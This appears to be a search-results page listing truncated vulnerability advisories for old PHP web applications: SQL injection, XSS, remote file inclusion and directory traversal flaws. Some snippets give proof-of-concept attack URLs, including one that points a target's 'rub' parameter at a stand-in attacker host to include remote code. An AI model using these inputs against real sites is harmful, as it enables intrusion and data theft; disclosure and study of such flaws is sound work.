17 matches found
LinksCaffe30.txt
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...
Lazarus Guestbook Cross Site Scripting Vulnerabilities
Produce : Lazarus Guestbook Website : http://carbonize.co.uk/Lazarus/ Version : = 1.6 Problem : Cross Site Scripting 1 The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised This can be exploited to execute arbitrary HTML and javascript cod...
Pearl Products Multiple Remote File Inclusion
Pearl Products Multiple Remote File Inclusion Discovered By zero Moroccan Security Team Affected softwares: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------ PoC...
openGuestbook.txt
Produce : Open Guestbook 0.5 Site : http://sourceforge.net/projects/openguestbook Discovred by: Moroccan Security Team Simo64 Greetz to : And All Friends : Details : ========= +Cross Site Scripting -vulnerable code in header.php on line 5 1 2 3 4 5 -------------------- Exploit :...
Scry Gallery Directory Traversal & Full Path Disclosure Vulnerabilites
Software : Scry Gallery WebSite :http://scry.org/ discovred by :Moroccan Security Team + Directory Traversal : A remote attacker may employ directory traversal strings '../' to access arbitrary files outside of the webroot directory. This flaw is due to an input validation error in the "index.php...
Sire2.0Nws.txt
by Moroccan Security Team Geetz To All Freind +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit...
Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability
Exploit for unknown platform in category web applications ============================================================================ Sire 2.0 lire.php Remote File Inclusion/Arbitary File Upload Vulnerability ============================================================================ +File...
Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload
+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...
DbbS<=2.0-alpha SQL injection
author: DaBDouB-MoSiKaR Moroccan Security Team site: http://www.dbbs.sup.fr/ greetz to : Moroccan Security Team CiM-TeaM and All Freinds exemple: http://target/topics.php?fid=3&limite=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
nuked-SQL.txt
+nuked-klan +www.nuked-klan.org +founded By Moroccan Security Team +special 10x to:CiM-TeaM,Esp!onLeRaVaGe,nabil,Dranzelz,SnIpErSA,www.lezr.com +exemple +http://target/index.php?file=Calendar&m=sql&y=2006 +have nice day...
dabdoubSQL.txt
author: DaBDouB-MoSiKaR Moroccan Security Team site: www.o2php.com greetz to : Moroccan Security Team CiM-TeaM and All Freinds Solution: intval exemple: http://target/post.php?action=newthread&fid=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
UBBThreads.txt
+UBBThreads -Founded By Moroccan Security Team +we are DaBDouB-MoSiKaR,simo64,ki11er,Dr.E-Vil,|ucifier +special 10x: to all friends SnIpErSA,CrashOvErrIdE king-hacker,CiM-TeaM,ameer,Dranzelz,Esp!onLeRaVaGe and www.lezr.com +Solution:Upgrade to a version 6.0.3...
dbbs.txt
author: DaBDouB-MoSiKaR Moroccan Security Team site: http://www.dbbs.sup.fr/ greetz to : Moroccan Security Team CiM-TeaM and All Freinds exemple: http://target/topics.php?fid=3&limite=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
author: Moroccan Security Team Vendor: www.MediaSlash.com Vendor Contacted greetz to : Moroccan Security Team CiM-TeaM and All Freinds Google : Powered by MediaSlash.com Details: MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability This flaw is due to an input validation error...
nuked-klan<=1.7.5 SQL Injection
+nuked-klan +www.nuked-klan.org +founded By Moroccan Security Team +special 10x to:CiM-TeaM,Esp!onLeRaVaGe,nabil,Dranzelz,SnIpErSA,www.lezr.com +exemple +http://target/index.php?file=Calendar&m=sql&y=2006 +have nice day...
Mini-Nuke<=1.8.2 SQL injection (6)
//mini-nuke board turk have many sql injection founded by Moroccan Security Team //Creetz to: Moroccan Security Team Dr.E-vil,Dr.Erase,H0550N,|ucifer,DaBDouB-MoSiKaR OverclockiX,ki11er ,Dranzelz,Esp!onLeRaVaGe,ameer,www.lezr.com and all muslim morocco 1...
phpWebsite <= SQL Injection (friend.php) & (article.php)
+phpWebsite +DaBDouB-MoSiKaR Moroccan Security Team +creetz to: Moroccan security TeamDr.E-vil,Dr.Erase,H0550N,ToM-le-Magicianfrance , ameeregypt, Esp!onLeRaVaGe, CiM TeaM, xMs3D0,|ucifer,B6,al-houda membersnabil,sn!per,Kasparovand all hackers musilm morocco and www.lezr.com +special 10x to: safa...